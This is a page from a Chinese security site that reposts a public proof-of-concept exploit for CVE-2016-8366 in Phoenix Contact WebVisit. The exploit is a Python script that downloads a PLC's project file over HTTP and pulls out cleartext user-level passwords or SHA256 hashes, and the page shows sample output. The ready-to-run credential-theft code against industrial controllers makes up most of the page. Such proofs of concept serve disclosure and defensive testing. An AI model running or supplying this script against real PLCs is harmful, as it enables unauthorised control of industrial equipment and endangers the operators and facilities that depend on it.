首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Phoenix Contact WebVisit 6.40.00 - Password Disclosure
来源:vfocus.net 作者:Photubias 发布时间:2018-10-12  
# Exploit Title: Phoenix Contact WebVisit 6.40.00 - Password Disclosure
# Exploit Author: Deneut Tijl
# Date: 2018-09-30
# Vendor Homepage: www.phoenixcontact.com
# Software Link: https://www.phoenixcontact.com/online/portal/nl/?uri=pxc-oc-itemdetail:pid=2985725&library=nlnl&pcck=P-19-05-01&tab=5
# Version: WebVisit < 6.40.00
# CVE: CVE-2016-8366
 
# This script will perform retrieval of clear text credentials for a Phoenix Contact PLC with a WebVisit GUI,
# password protected, application on it Tested on the Phoenix Contact ILC-390 PLC, but others are
# surely equally vulnerable with WebVisit 6.40.00, the passwords are SHA256 hashes, which also will be retrieved
        
# Sample output:
# C:\Users\admin\Desktop>CVE-2016-8366.py
# Please enter an IP [192.168.1.200]:
# This is the password for userlevel 1: pw1
# This is the password for userlevel 2: SuperPass2
# This is the password for userlevel 3: Extreme2TheMax3
# This is the password for userlevel 4: PowerPass4
# Press Enter to exit
 
# PoC
 
#! /usr/bin/env python
 
import urllib2, binascii
 
strIP = raw_input('Please enter an IP [192.168.1.200]: ')
if strIP == '': strIP = '192.168.1.200'
 
try:
    URLResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/'))
except urllib2.HTTPError:
    print('#### Critical Error with IP ' + strIP + ': no response')
    raw_input('Press Enter to exit')
    exit()
 
strMainTEQ = ''
for line in URLResponse.readlines():
    if 'MainTEQName' in line:
        strMainTEQ = line.split('VALUE="')[1].split('"')[0]
 
if strMainTEQ == '':
    print('#### Error, no \'MainTEQ\' found on the main page')
    raw_input('Press Enter to exit')
    exit()
 
try:
    LoginTeqResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/' + strMainTEQ))
except urllib2.HTTPError:
    print('Critical Error with IP ' + strIP + ': File \'' + strMainTEQ + '\' not found')
    raw_input('Press Enter to exit')
    exit()
strAlldata = ''
for line in LoginTeqResponse.readlines():
    strAlldata += binascii.hexlify(line)
 
## For vulnerable webvisit:
## Seems to be 'userLevel' + x bytes + 1 + y bytes + 'password'
## userLevel + '0506030001' + 31 + '00030003010301068300' + passlength + 'password'
## For WebVisit > 6.40.00
## userLevel + '0003000301030b06830040' + 'SHA256' (wich is 64 bytes)
 
arrData = strAlldata.split('757365724c6576656c0506030001') ## userLevel + '0506030001'
for item in arrData:
    if '00030003010301068300' in item:
        intUserlevel = int(binascii.unhexlify(item[:2]), 16) ## Turn str '31' into int 1
        strPassLength = item.split('00030003010301068300')[1][:2]
        strPassword = binascii.unhexlify(item.split('00030003010301068300')[1][2:2+(2*int(strPassLength,16))])
        print('This is the password for userlevel ' + str(intUserlevel) + ': ' + strPassword)
    elif '0003000301030b06830040' in item:
        intUserlevel = int(binascii.unhexlify(item[:2]), 16)
        strHash = binascii.unhexlify(item.split('0003000301030b06830040')[1][:64*2])
        print('This is the hash for userlevel ' + str(intUserlevel) + ': ' + strHash.lower())
raw_input('Press Enter to exit')
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·VideoScript 3.0 <= 4.0.1.50 Of
  相关文章
·Microsoft SQL Server Managemen
·Phoenix Contact WebVisit 29857
·Microsoft SQL Server Managemen
·Microsoft SQL Server Managemen
·VLC Media Player 2.2.8 MKV Use
·DELL EMC OneFS Storage Adminis
·Delta Electronics Delta Indust
·MicroTik RouterOS < 6.43rc3 -
·FileZilla 3.33 - Buffer Overfl
·Microsoft Edge Chakra JIT - Ty
·Microsoft Edge Chakra JIT - 'B
·Free MP3 CD Ripper 2.8 - '.wma
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved